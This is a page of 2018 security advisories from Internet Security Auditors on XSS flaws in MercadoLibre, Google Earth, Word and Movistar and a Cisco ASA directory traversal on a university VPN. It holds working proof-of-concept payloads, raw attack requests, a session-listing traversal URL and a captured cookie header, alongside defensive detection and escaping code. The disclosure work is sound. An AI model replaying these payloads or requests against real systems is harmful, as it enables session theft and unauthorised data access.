Advisories 2018

2018-001: XSS Reflected in Mercadolibre

Original release date: June 8th, 2018
Last revised: June 25th, 2018
Discovered by: Gonzalo Carrasco
Severity: 6.1/10 (CVSSv3 Base Score)

BACKGROUND

MercadoLibre is an Argentine company that runs an online marketplace, sales and Internet payments service for its registered users. It operates in Bolivia, Brazil, Chile, Colombia, Costa Rica, Ecuador, Guatemala, Mexico, Nicaragua, Panama, Peru, Paraguay, El Salvador, the Dominican Republic, Uruguay, Honduras and Venezuela.

Users can sell and/or auction both new and used products at a fixed or variable price; private services are also offered.

DESCRIPTION

The application reflects injected JavaScript code back to the user without encoding it, so an attacker only has to send a crafted URL to a victim to, for example, obtain the victim's session cookies.

PROOF OF CONCEPT

The vulnerable parameter is "q" and the injection is delivered via the GET method.
The attack works with the parameter "type" set to:
* type=recent
* type=archived

Example:

https://myaccount.mercadolibre.com.ar/sales/list#type=recent&q="><svg/onload=alert(8)>


Request:

GET /sales/cartSearch?type=recent&q="><svg/onload=alert(8)> HTTP/1.1
Host: myaccount.mercadolibre.com.ar
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://myaccount.mercadolibre.com.ar/sales/list
X-NewRelic-ID: XQ4OVF5VGwIIUFZQAQUB
X-Requested-With: XMLHttpRequest


Response:

<form data-component="actions-search" class="form-search" onsubmit="return false;">
			<div id="iePlaceHolder" class="ie-place-holder">Comprador o venta</div>
			<input type="text" id="search" name="search" class="txt-search" placeholder="Comprador o venta" value=""> 
			<svg/onload=alert(8)>
			<input type="button" id="searchBtn" value="Buscar" class="ch-btn-skin ch-btn-small">
</form>

We can see that the server does not filter the special characters correctly, which allows a malicious user to inject arbitrary code. The "svg" tag entered is embedded within the server's response, making the vulnerability exploitable.

DEMO: https://youtu.be/ugiNFsPJ85k

BUSINESS IMPACT

The effects of the discovered vulnerability reach a medium-to-critical level, depending on the interaction achieved with the victim user and on that user's status: if at the time of the attack the user has an active session with their MercadoLibre account, their current cookies could be captured.

SYSTEMS AFFECTED

MercadoLibre website (vulnerable until June 13th, 2018).

SOLUTION

Preventing XSS requires separation of untrusted data from active browser content:

  • The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
  • Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
  • For rich content, consider auto-sanitization libraries like OWASP's AntiSamy or the Java HTML Sanitizer Project.
  • Consider Content Security Policy (CSP) to defend against XSS across your entire site.


Reference: XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

REFERENCES

https://www.mercadolibre.com

CREDITS

This vulnerability has been discovered by Gonzalo Carrasco (pgcarrasco <at> isecauditors.com).

REVISION HISTORY

June 8th, 2018: Initial release

DISCLOSURE TIMELINE

June  8th, 2018: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
June  8th, 2018: Contact with MercadoLibre.
June  8th, 2018: Answer from MercadoLibre.
June 13th, 2018: Vulnerability corrected by MercadoLibre.
June 25th, 2018: Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.


2018-002: (Blind) Stored XSS on earth.google.com

Original release date: 2018 February 2nd
Last revised: 2018 August 2nd
Discovered by: Fabian Cuchietti

BACKGROUND

Google Earth is an online application that renders a 3D representation of Earth based on satellite imagery.

DESCRIPTION

This vulnerability allows arbitrary HTML/script code to be executed in the context of the victim user's computer, and the payload is stored in the affected application.

PROOF OF CONCEPT

1) Go to http://earth.google.com/web
2) Go to My Places
3) Click on Import KMZ file
4) Select the file that contains the attack vector, e.g. xss.kml, and upload it.
4.1) Payload: "><img src=x id=payload-base64 onerror=eval(atob(this.id))>
5) Click on Save
6) Preview
7) The XSS is reflected in the third-party application used for this XSS; in my case, I used XSSHUNTER.

 
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code on a targeted user's computer, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

Current earth.google.com web application.

SOLUTION

Proper input validation.

REFERENCES

https://earth.google.com/

CREDITS

This vulnerability has been discovered by Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

Feb 02, 2018 : Initial advisory
Aug 02, 2018 : Update for disclosure

DISCLOSURE TIMELINE

Feb 02, 2018 : Vulnerability acquired by Internet Security Auditors
Feb 02, 2018 : Contact with Google Security Team
Feb 02, 2018 : Google feedback (won't fix)
Aug 02, 2018 : Vulnerability Disclosure



2018-003: Stored XSS on Microsoft Word (Office 365)

Discovered by: Fabian Cuchietti

BACKGROUND

Microsoft Word is a word-processing program created by Microsoft and included by default in the Microsoft Office suite.

DESCRIPTION

This vulnerability allows arbitrary HTML/script code to be executed in the context of the victim user's computer, and the payload is stored in the affected application.

PROOF OF CONCEPT
  1. Open Microsoft Office Word
  2. In the menu, click on the "Insert" category
  3. Click on Video Online
  4. A popup window will open
  5. In the field for the code to insert the video, insert the attack vector: ">Click here
  6. The XSS executes successfully
 
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code on a targeted user's computer, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://www.microsoft.com/en-us/store/b/office365

SOLUTION

Preventing XSS requires separation of untrusted data from active browser content:

The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
For rich content, consider auto-sanitization libraries like OWASP's AntiSamy or the Java HTML Sanitizer Project.
Consider Content Security Policy (CSP) to defend against XSS across your entire site.

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered by Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

Feb 02, 2018

DISCLOSURE TIMELINE

Jun 16, 2018 : Vulnerability acquired by Internet Security Auditors
Jun 16, 2018 : Contact with Microsoft Security Team
Jun 20, 2018 : Microsoft feedback
Jul 07, 2018 : Vulnerability Disclosure



 

2018-004: Directory Traversal in the VPN of the UAM (Universidad Autónoma de Madrid)

Original release date: 09/08/2018
Last revised: 09/08/2018
Discovered by: Jorge Lajara
Severity: 5.0 CVSSv2 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

VULNERABILITY

A vulnerability (CVE-2018-0296) in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques.

BACKGROUND

The Remote Access Service (VPN) of the UAM (Universidad Autónoma de Madrid) is vulnerable to CVE-2018-0296.

DESCRIPTION

The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic.

PROOF OF CONCEPT
  1. Navigate to https://vpn.uam.es/+CSCOE+/logon.html#form_title_text
  2. Send a request to https://vpn.uam.es/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/ to list active sessions.
  3. Check the response.
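Detection logic for the request pattern in step 2, written as an added example for defenders and not taken from UAM or Cisco. It scans constructed combined-format access log lines (the shape a reverse proxy or log collector in front of the appliance would produce) for ".." traversals that resolve into the ASA's +CSCOE+ file tree; going beyond the advisory, the decoder also normalises single- and double-percent-encoded dot segments so both spellings are caught.

```python
"""Flag CVE-2018-0296-style traversal requests in HTTP access logs."""
import posixpath
import re
from urllib.parse import unquote

# Combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: a benign portal load, the traversal path quoted
# in the advisory, a double-encoded variant of it, and another benign hit.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Jul/2018:10:00:01 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 200 4120
203.0.113.7 - - [27/Jul/2018:10:00:09 +0200] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/ HTTP/1.1" 200 812
203.0.113.7 - - [27/Jul/2018:10:00:12 +0200] "GET /+CSCOU+/%252e%252e/+CSCOE+/files/file_list.json?path=%2F HTTP/1.1" 200 640
203.0.113.9 - - [27/Jul/2018:10:01:30 +0200] "GET /+CSCOE+/portal.html HTTP/1.1" 200 9000
"""


def decode_path(target: str) -> str:
    """Drop the query string, then percent-decode until stable (bounded)
    so %2e and %252e dot segments compare equal to a literal '..'."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_cscoe_traversal(target: str) -> bool:
    """True when the path contains a '..' segment and, once resolved,
    lands inside the appliance's internal +CSCOE+/files/ tree."""
    path = decode_path(target)
    has_dotdot = any(seg == ".." for seg in path.split("/"))
    resolved = posixpath.normpath(path)
    return has_dotdot and "/+CSCOE+/files/" in resolved


def scan(log_text: str) -> list:
    """Return (client ip, raw target, status) for every suspicious request.
    A 200 on such a request means the device answered, i.e. was unpatched."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cscoe_traversal(m.group("target")):
            hits.append((m.group("ip"), m.group("target"), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, target, status in scan(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```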
 
BUSINESS IMPACT

An attacker can cause a denial of service or obtain arbitrary information through directory traversal techniques.

SYSTEMS AFFECTED

https://vpn.uam.es/+CSCOE+/logon.html#form_title_text

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Path_Traversal
https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2018-0296#meta...

CREDITS

This vulnerability has been discovered by Jorge Lajara (jlajara (at) isecauditors (dot) com).

REVISION HISTORY

09/08/2018 : Initial release

DISCLOSURE TIMELINE

27/07/2018 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
27/07/2018 : Contact with UAM Security Team.
07/08/2018 : Vulnerability fixed by UAM Security Team.



 

2018-005: Cross Site Scripting (XSS Reflected) in Movistar

Original release date: 19/07/2018
Last revised: 26/10/2018
Discovered by: Gonzalo Carrasco
Severity: 4.7/10 (CVSSv3 Base Score)

VULNERABILITY

Cross Site Scripting (XSS Reflected) in Movistar

BACKGROUND

Movistar is the commercial brand of the Spanish telecommunications multinational Telefónica in Spain and Hispano-America, since May 1, 2010, for its fixed telephony, mobile, internet and television products. The "www.movistar.es" platform provides services to all its customers in a comfortable and fast way.

DESCRIPTION

The application accepts injected JavaScript code and reflects it back to the user, allowing an attacker to simply send a malicious URL to a victim and, for example, obtain the victim's session cookies.

PROOF OF CONCEPT
The vulnerable parameters are "xxxtipouserxxx", "xxxuserxxx" and "xxxpasswordxxx", and the injection is delivered via the GET method.
 
Example:
-- REQUEST:
GET /sr/sso/pub/servlet/login?tipoUs=P&xxxtypeUserxxx=titular&xxxmethodxxx=post&xxxurixxx=https%3A%2F%2Fwww.movistar.es%2Fmimovistar-cliente%2Fes-es%2Fparticulares%2FpostLogin.html&xxxuserxxx=123456789&xxxpasswordxxx=aSD1231&xxxtipouserxxx=P"><script>prompt(1)</script> HTTP/1.1
Host: www.movistar.es
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.movistar.es/mimovistar-cliente/es-es/particulares/login.html?ccliTokenSS=164adac9f5a559
Cookie: utag_main=v_id:0163bd2d2ba00013f7057242907404044007100900bd0$_sn:3$_ss:0$_st:1531923930124$_pn:24%3Bexp-session$ses_id:1531921591410%3Bexp-session; CSI_clicks_acum_particulares=0; TLTSID=fs2id47fzyq1527887245416; CSI_ultima_particulares=1527887249216; CSI_url_inicio_particulares=/t5/Ayuda-Gestiones-Contratos-y-Factura-Internet/dynamicip-rima-tde-net/td-p/3086562; CSI_page_name_inicio_particulares=comunidad%3Aportada%3Aforos%3Ainternet%3Aayuda-tarifas%3A.dynamicip.rima-tde.net; _ga=GA1.2.370576869.1527887249; JSESSIONID=tvN0bP2Lz7Vb8LY6h3mN2h2621vNFvnrxvfBh7wY2xXY7lVwT0dS!905856882; 7a5f68f5df444a4f87157280100000f7=en; USER_CLASS=519150693; COL=18071809964270AHOGes00002018071877777; SEG_NAV=particulares; SEG_NAV_ES=particulares; MI_MOVISTAR=NABAGNLNN; _gid=GA1.2.168189848.1531917965; __utma=151739813.370576869.1527887249.1531917965.1531921565.2; __utmc=151739813; __utmz=151739813.1531921565.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __mc=-4526385577924454000; _mc_uuid=118218df-d4ed-47d1-ad5c-57dda7321439; _mc_sessorigin=seo; _mc_sessid=1531917965470; IC_XCOL=; IC_XCOL_1=; gwIsp_i3=mov; gwIsp_i3_d=mov; optimizelyEndUserId=oeu1531917967732r0.5122833511510013; optimizelySegments=%7B%7D; optimizelyBuckets=%7B%7D; compruebaCkE=1; TS866899=e7efedca1d13dfc670d7bd1158242e7aadf07615246704f85b4f449b; check=true; mbox=PC#56aaa47249c843fd84f693af4a3ecfb8.26_16#1595162840|session#3e5366681fb742b7aec35779677e69bf#1531923989; gwIsp=mov; __utmb=151739813.4.9.1531921718694; woid=19d4d5c4-2028-97a7-9ea6-940257cd65f0; CCLIJSESSIONID=sf1zbPGXdf0Tp9bmD77RTf7ndJhpNpj2lzylJ0ztVvV3JS2KG4K2!-624340416; AMP_TOKEN=%24NOT_FOUND; _gat_tealium_0=1; _gat=1
-- RESPONSE:
HTTP/1.1 200 OK
Server: XXXXXX
Content-Length: 2920
X-ORACLE-DMS-ECID: 3cfcdc11-88a2-4d98-bb23-b5f86b7a6d30-00b80194
X-ORACLE-DMS-RID: 0
Content-Type: text/html; charset=ISO-8859-1
Connection: close
<input name="xxxtipouserxxx" value="P"><script>prompt(1)</script>" type="hidden">

BUSINESS IMPACT

The effects of the discovered vulnerability reach a medium-to-critical level, depending on the interaction achieved with the victim user and on that user's status: if at the time of the attack the user has an active session with their Movistar account, their current cookies could be captured.

SYSTEMS AFFECTED

Movistar website

SOLUTION

Preventing XSS requires separation of untrusted data from active browser content:

The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.

Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.

For rich content, consider auto-sanitization libraries like OWASP's AntiSamy or the Java HTML Sanitizer Project.

Consider Content Security Policy (CSP) to defend against XSS across your entire site.
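The first point above, context-aware escaping, applied to the attribute context that both this advisory and 2018-001 show being broken (a value dropped into a double-quoted `value=""` attribute). This is an added example, not MercadoLibre's or Movistar's code: the `<input>` template is constructed to mirror the shape of the two vulnerable responses, and the two payloads are the ones quoted in the advisories.

```python
"""Attribute-context output encoding versus raw concatenation."""
import html
import re

# Reflected payloads quoted in advisories 2018-001 and 2018-005.
PAYLOAD_ML = '"><svg/onload=alert(8)>'
PAYLOAD_MOV = 'P"><script>prompt(1)</script>'


def render_vulnerable(value: str) -> str:
    """Raw concatenation into a double-quoted attribute, the pattern both
    responses show: a '"' in the input closes the attribute and whatever
    follows is parsed as new markup."""
    return '<input type="text" name="search" value="' + value + '">'


def render_escaped(value: str) -> str:
    """Same template, but the value is HTML-attribute-encoded first.
    html.escape(quote=True) turns & < > " ' into entities, so the browser
    can only ever read the value as attribute text, never as a tag."""
    return ('<input type="text" name="search" value="'
            + html.escape(value, quote=True) + '">')


_START_TAG_RE = re.compile(r"<\s*[a-zA-Z]")


def count_elements(markup: str) -> int:
    """Number of element start tags the browser would see. For this
    template the correct answer is always exactly one (the <input>)."""
    return len(_START_TAG_RE.findall(markup))


if __name__ == "__main__":
    for payload in (PAYLOAD_ML, PAYLOAD_MOV):
        bad, good = render_vulnerable(payload), render_escaped(payload)
        print(f"vulnerable ({count_elements(bad)} elements): {bad}")
        print(f"escaped    ({count_elements(good)} elements): {good}")
```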

REFERENCES

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

CREDITS

This vulnerability has been discovered by Gonzalo Carrasco (pgcarrasco (at) isecauditors (dot) com).

REVISION HISTORY

19/07/2018 : Initial release
26/10/2018 : Final release.

DISCLOSURE TIMELINE

July 19th, 2018: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
July 20th, 2018: Contact with Movistar.
July 20th, 2018: Answer from Movistar.
August 16th, 2018: Vulnerability corrected by Movistar, but not yet confirmed.
August 29th, 2018: Vulnerability confirmed by Movistar.
October 26th, 2018: Advisory published.
